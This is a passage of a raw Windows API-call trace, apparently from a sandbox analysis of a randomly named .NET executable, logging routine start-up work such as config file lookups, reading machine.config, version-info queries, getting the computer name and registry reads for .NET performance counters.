lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", nBufferLength=0x105, lpBuffer=0x24e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", lpFilePart=0x0) returned 0x41 [0043.515] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x24eee0 | out: lpFileInformation=0x24eee0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.515] GetCurrentProcess () returned 0xffffffff [0043.515] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ee9c | out: TokenHandle=0x24ee9c*=0x28c) returned 1 [0043.516] GetCurrentProcess () returned 0xffffffff [0043.516] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ee58 | out: TokenHandle=0x24ee58*=0x290) returned 1 [0043.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", nBufferLength=0x105, lpBuffer=0x24ea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", lpFilePart=0x0) returned 0x41 [0043.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", nBufferLength=0x105, lpBuffer=0x24e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", lpFilePart=0x0) returned 0x41 [0043.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", nBufferLength=0x105, lpBuffer=0x24ea14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpFilePart=0x0) returned 0x3a [0043.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", nBufferLength=0x105, lpBuffer=0x24e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpFilePart=0x0) returned 0x3a [0043.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", nBufferLength=0x105, lpBuffer=0x24e9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpFilePart=0x0) returned 0x3a [0043.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x24ee44) returned 1 [0043.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe"), fInfoLevelId=0x0, lpFileInformation=0x24eec0 | out: lpFileInformation=0x24eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x507c4880, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x507c4880, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0043.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x24ee40) returned 1 [0043.518] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpdwHandle=0x24ef34 | out: lpdwHandle=0x24ef34) returned 0x6ac [0043.518] GetFileVersionInfoW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x28e9c90 | out: lpData=0x28e9c90) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24ef08, puLen=0x24ef04 | out: lplpBuffer=0x24ef08*=0x28e9d2c, puLen=0x24ef04) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9dcc, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9dfc, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9e30, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9e64, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9e98, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9f2c, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9f5c, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9f94, puLen=0x24ee84) returned 1 [0043.518] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9d84, puLen=0x24ee84) returned 1 [0043.519] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x28e9ef4, puLen=0x24ee84) returned 1 [0043.519] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x0, puLen=0x24ee84) returned 0 [0043.519] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24ee88, puLen=0x24ee84 | out: lplpBuffer=0x24ee88*=0x0, puLen=0x24ee84) returned 0 [0043.519] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24ee7c, puLen=0x24ee78 | out: lplpBuffer=0x24ee7c*=0x28e9d2c, puLen=0x24ee78) returned 1 [0043.519] VerLanguageNameW (in: wLang=0x0, szLang=0x24ec0c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0043.519] VerQueryValueW (in: pBlock=0x28e9c90, lpSubBlock="\\", lplpBuffer=0x24ee8c, puLen=0x24ee88 | out: lplpBuffer=0x24ee8c*=0x28e9cb8, puLen=0x24ee88) returned 1 [0043.520] CoTaskMemAlloc (cb=0x20c) returned 0x49af08 [0043.520] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x49af08 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0043.520] CoTaskMemFree (pv=0x49af08) [0043.520] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x24e9ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0043.520] CoTaskMemAlloc (cb=0x20c) returned 0x49af08 [0043.520] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x49af08 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0043.521] CoTaskMemFree (pv=0x49af08) [0043.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x24e9ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0043.521] GetCurrentProcess () returned 0xffffffff [0043.521] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ee44 | out: TokenHandle=0x24ee44*=0x294) returned 1 [0043.521] GetCurrentProcess () returned 0xffffffff [0043.522] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ee44 | out: TokenHandle=0x24ee44*=0x298) returned 1 [0043.522] GetCurrentProcess () returned 0xffffffff [0043.522] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ed10 | out: TokenHandle=0x24ed10*=0x29c) returned 1 [0043.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\v5vybig3hwd7d5jw.exe_url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x24ed10 | out: lpFileInformation=0x24ed10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x24e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x88 [0043.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\v5vybig3hwd7d5jw.exe_url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x24ed10 | out: lpFileInformation=0x24ed10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.523] GetCurrentProcess () returned 0xffffffff [0043.523] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ee44 | out: TokenHandle=0x24ee44*=0x2a0) returned 1 [0043.523] GetCurrentProcess () returned 0xffffffff [0043.524] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ed10 | out: TokenHandle=0x24ed10*=0x2a4) returned 1 [0043.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\v5vybig3hwd7d5jw.exe_url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x24ed10 | out: lpFileInformation=0x24ed10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.524] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x24e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x86 [0043.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\v5vybig3hwd7d5jw.exe_url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x24ed10 | out: lpFileInformation=0x24ed10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.526] GetCurrentProcess () returned 0xffffffff [0043.526] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ef24 | out: TokenHandle=0x24ef24*=0x2a8) returned 1 [0043.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x24e9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0043.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x24ef24 | out: lpFileInformation=0x24ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0043.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x24e95c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0043.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x24ee50) returned 1 [0043.526] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2ac [0043.526] GetFileType (hFile=0x2ac) returned 0x1 [0043.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x24ee4c) returned 1 [0043.527] GetFileType (hFile=0x2ac) returned 0x1 [0043.527] GetFileSize (in: hFile=0x2ac, lpFileSizeHigh=0x24ef18 | out: lpFileSizeHigh=0x24ef18*=0x0) returned 0x8c8f [0043.527] ReadFile (in: hFile=0x2ac, lpBuffer=0x28f0928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eed4, lpOverlapped=0x0 | out: lpBuffer=0x28f0928*, lpNumberOfBytesRead=0x24eed4*=0x1000, lpOverlapped=0x0) returned 1 [0043.527] ReadFile (in: hFile=0x2ac, lpBuffer=0x28f0928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ed70, lpOverlapped=0x0 | out: lpBuffer=0x28f0928*, lpNumberOfBytesRead=0x24ed70*=0x1000, lpOverlapped=0x0) returned 1 [0043.528] ReadFile (in: hFile=0x2ac, lpBuffer=0x28f0928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ec24, lpOverlapped=0x0 | out: lpBuffer=0x28f0928*, lpNumberOfBytesRead=0x24ec24*=0x1000, lpOverlapped=0x0) returned 1 [0043.528] ReadFile (in: hFile=0x2ac, lpBuffer=0x28f0928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ec24, lpOverlapped=0x0 | out: lpBuffer=0x28f0928*, lpNumberOfBytesRead=0x24ec24*=0x1000, lpOverlapped=0x0) returned 1 [0043.528] ReadFile (in: hFile=0x2ac, lpBuffer=0x28f0928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ec24, lpOverlapped=0x0 | out: lpBuffer=0x28f0928*, lpNumberOfBytesRead=0x24ec24*=0x1000, lpOverlapped=0x0) returned 1 [0043.528] ReadFile (in: hFile=0x2ac, lpBuffer=0x28f0928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eb5c, lpOverlapped=0x0 | out: lpBuffer=0x28f0928*, lpNumberOfBytesRead=0x24eb5c*=0x1000, lpOverlapped=0x0) returned 1 [0043.528] CloseHandle (hObject=0x2ac) returned 1 [0043.529] GetCurrentProcess () returned 0xffffffff [0043.529] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24eee0 | out: TokenHandle=0x24eee0*=0x2ac) returned 1 [0043.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", nBufferLength=0x105, lpBuffer=0x24e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", lpFilePart=0x0) returned 0x41 [0043.529] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x24eee0 | out: lpFileInformation=0x24eee0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.530] GetCurrentProcess () returned 0xffffffff [0043.530] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ee9c | out: TokenHandle=0x24ee9c*=0x2b0) returned 1 [0043.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x24e948, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x88 [0043.530] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\v5vybig3hwd7d5jw.exe_url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x24ee9c | out: lpFileInformation=0x24ee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.530] GetCurrentProcess () returned 0xffffffff [0043.530] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ee58 | out: TokenHandle=0x24ee58*=0x2b4) returned 1 [0043.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x24e904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x86 [0043.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\v5vYBIG3hWD7d5JW.exe_Url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\v5vybig3hwd7d5jw.exe_url_rlbjgubybihqikq2fk4uc4pdtvf3y0re\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x24ee58 | out: lpFileInformation=0x24ee58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.542] GetCurrentProcess () returned 0xffffffff [0043.542] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ed08 | out: TokenHandle=0x24ed08*=0x2b8) returned 1 [0043.548] GetCurrentProcess () returned 0xffffffff [0043.548] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ec48 | out: TokenHandle=0x24ec48*=0x2bc) returned 1 [0043.555] GetCurrentProcess () returned 0xffffffff [0043.555] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ec90 | out: TokenHandle=0x24ec90*=0x2c0) returned 1 [0043.939] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x476020 [0043.970] GetCurrentProcessId () returned 0xad0 [0043.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x24e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0043.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x24e440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0043.981] CoTaskMemAlloc (cb=0x46) returned 0x48d0b0 [0043.981] CoTaskMemAlloc (cb=0xc8) returned 0x49afd8 [0043.981] CoTaskMemFree (pv=0x48d0b0) [0043.981] CoTaskMemFree (pv=0x49afd8) [0044.203] GetComputerNameW (in: lpBuffer=0x24d88c, nSize=0x2921d90 | out: lpBuffer="XDUWTFONO", nSize=0x2921d90) returned 1 [0044.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET Data Provider for SqlServer\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dac4 | out: phkResult=0x24dac4*=0x2c4) returned 0x0 [0044.208] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x24dad8, lpData=0x0, lpcbData=0x24dad4*=0x0 | out: lpType=0x24dad8*=0x1, lpData=0x0, lpcbData=0x24dad4*=0x1c) returned 0x0 [0044.208] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x24dad8, lpData=0x2922a1c, lpcbData=0x24dad4*=0x1c | out: lpType=0x24dad8*=0x1, lpData="netfxperf.dll", lpcbData=0x24dad4*=0x1c) returned 0x0 [0044.209] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x24dae4, lpData=0x0, lpcbData=0x24dae0*=0x0 | out: lpType=0x24dae4*=0x4, lpData=0x0, lpcbData=0x24dae0*=0x4) returned 0x0 [0044.209] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x24dae4, lpData=0x24dad0, lpcbData=0x24dae0*=0x4 | out: lpType=0x24dae4*=0x4, lpData=0x24dad0*=0x1, lpcbData=0x24dae0*=0x4) returned 0x0 [0044.210] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x24dae4, lpData=0x0, 